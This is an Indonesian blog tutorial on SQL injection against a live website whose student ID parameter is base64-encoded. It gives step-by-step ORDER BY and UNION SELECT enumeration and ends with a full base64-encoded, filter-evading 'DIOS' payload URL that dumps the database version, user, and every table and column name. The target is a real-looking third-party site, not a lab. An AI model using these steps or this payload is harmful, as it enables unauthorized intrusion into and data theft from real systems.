Cara SQL chall base 64
Assalamu'alaikum para pecinta chall,kembali lagi bersama saya Indra dan kali ini saya akan berikan kepada kalian tutorial cara SQL chall base64 simak saja:)
Bahan yg di gunakan:
- apk codec(link download)
- dios lah pastinya
- chrome atau bisa pakai anon hackbar
Nah di tutorial kali ini gw akan menggunakan anon hackbar, untuk caranya sama aja sih:)
Target:
https://ashartacademy.in/student.php?id=MjE=
Mulai eksekusi.
-------------------------------------------------------------------
kita masuk ke webnya,kita ambil parameternya yg menggunakan kode base 64,sesuai judul pembahasan kita kali ini:)
MjE= <--nah parameter nya itu kita decode menggunakan aplikasi codec
Tempel di decode parameter nya!!!
Nah ntar berubah jadi angka,lalu kita coba kasih tanda petik('), seperti sql biasa pada umumnya tapi bedanya adalah kita ubah bagian parameter,dios,dan columnya
-------------------------------------------------------------------
Lanjut
Kita order by terlebih dahulu:)
Nah kalian salin order by yg udah di encode menjadi kode base 64 tempel pada target
Ini adalah tampilan website yg belum erorr
Nah kita order by lagi
21' Order by 2-- - dijadikan base 64
21' Order by 3-- - dijadikan base 64
Dan sampai ketemu errornya,nah disini saya sudah menemukan colum yg error
21' order by 12-- - dijadikan base 64
Nah tinggal di union select aja, caranya sama seperti biasa tapi di ubah dulu menjadi base 64 :)
Salin codenya lalu di tempel
Nah angka togel ada di angka 5,6,8 nah itu terserah mau nempel diosnya dimana,kalo gw sih yg paling atas,berhubung 5 yg gw pilih tempel diosnya di angka 5 :)
Salin kode base 64 nya,lalu tempel di target kayak cara di atas tadi :)
Dan jadilah hekerrrrrrr awoakwok
Berhubung ini buat pembelajaran jadi qwery gw kasihh yaa🥰,pelajari jgn cuma ambil qwery nya aja🥰
Mohon maaf jika ada kesalahan
Dan jika ingin bertanya silahkan klik saja tautan ini wa Indra
https://ashartacademy.in/student.php?id=LTIxJyBVTklPTiBTRUxFQ1QgMSwyLDMsNCwvKiE1MDAwMGNPbmNhdC8qKktJQ0tfT1VUKiovKi8oMHgzQzYzNjU2RTc0NjU3MjNFM0M2OTZENjcyMDczNzI2MzNEMjI2ODc0NzQ3MDczM0EyRjJGNjQyRTc0NkY3MDM0NzQ2RjcwMkU2OTZGMkY3MDVGMzEzODM3MzYzMTc3MzU3OTYzMzAyRTZBNzA2NzIyMjA3NzY5NjQ3NDY4M0QyMjM1MzAyNTIyM0UzQzYyNzIzRTNDNjI3MjNFM0M2MjcyM0UzQzY4MzEyMDczNzQ3OTZDNjUzRDIyNjM2RjZDNkY3MjNBNzI2NTY0MjIzRTJFMkY2RTY0NzI2MTYxNjEzQzJGNjgzMTNFM0MyRjYzNjU2RTc0NjU3MjNFLDB4NTU3MzY1NzIyMDNhM2EyMCwweDNjNjI3MjNlLC8qITUwMDAwVmVyU2lPbi8qKktJQ0tfT1VUKiovKi8oKSwweDNjNjI3MjNlLDB4NTU1MzQ1NTIzYTNhMjAsLyohNTAwMDBVc0VyLyoqS0lDS19PVVQqKi8qLygpLDB4M2M2MjcyM2UsMHg0NDQxNTQ0MTQyNDE1MzQ1M2EzYTIwLC8qITUwMDAwRGFUYWJhU2UvKipLSUNLX09VVCoqLyovKCksMHgzYzYyNzIzZSwoc2VsRWN0KEB4KS8qITUwMDAwZlJvbS8qKktJQ0tfT1VUKiovKi8oLyohNTAwMDBzRWxlY3QvKipLSUNLX09VVCoqLyovKEB4Oj0weDAwKSwoc0VsZWN0KDApLyohRnJvbS8qKktJQ0tfT1VUKiovKi8oLyohNTAwMDBpbmZvck1hdGlvbl9zY2hFbWEuY29MdU1ucy8qKktJQ0tfT1VUKiovKi8pLyohNTAwMDBXaGVyZS8qKktJQ0tfT1VUKiovKi8odGFCbGVfc2NoZW1hPS8qITUwMDAwRGF0QWJhc2UvKipLSUNLX09VVCovKi8oKSlhbmQoMHgwMClpbihAeDo9LyohNTAwMDBjb05jYXQvKipLSUNLX09VVCoqLyovKEB4LDB4M2M2MjcyM2UsMHgzYzY2NmY2ZTc0MjA2MzZmNmM2ZjcyM2QyMjcyNjU2NDIyM2UyZDJkM2UyMDNjMmY2NjZmNmU3NDNlLDB4M2M2NjZmNmU3NDIwNjM2ZjZjNmY3MjNkMjI2NzcyNjU2NTZlMjIzZSwvKiE1MDAwMHRBYmxlX25hTWUvKipLSUNLX09VVCoqLyovLDB4M2M2NjZmNmU3NDIwNjM2ZjZjNmY3MjNkMjI3MjY1NjQyMjNlMjAzYTNhMjAzYzY2NmY2ZTc0MjA2MzZmNmM2ZjcyM2QyMjY3NzI2NTY1NmUyMjNlLC8qITUwMDAwY29sVW1uX25hTWUvKipLSUNLX09VVCoqLyovKSkpKXgpKSw2LDcsOCw5LDEwLDExLDEyLS0gLQ==
Posting Komentar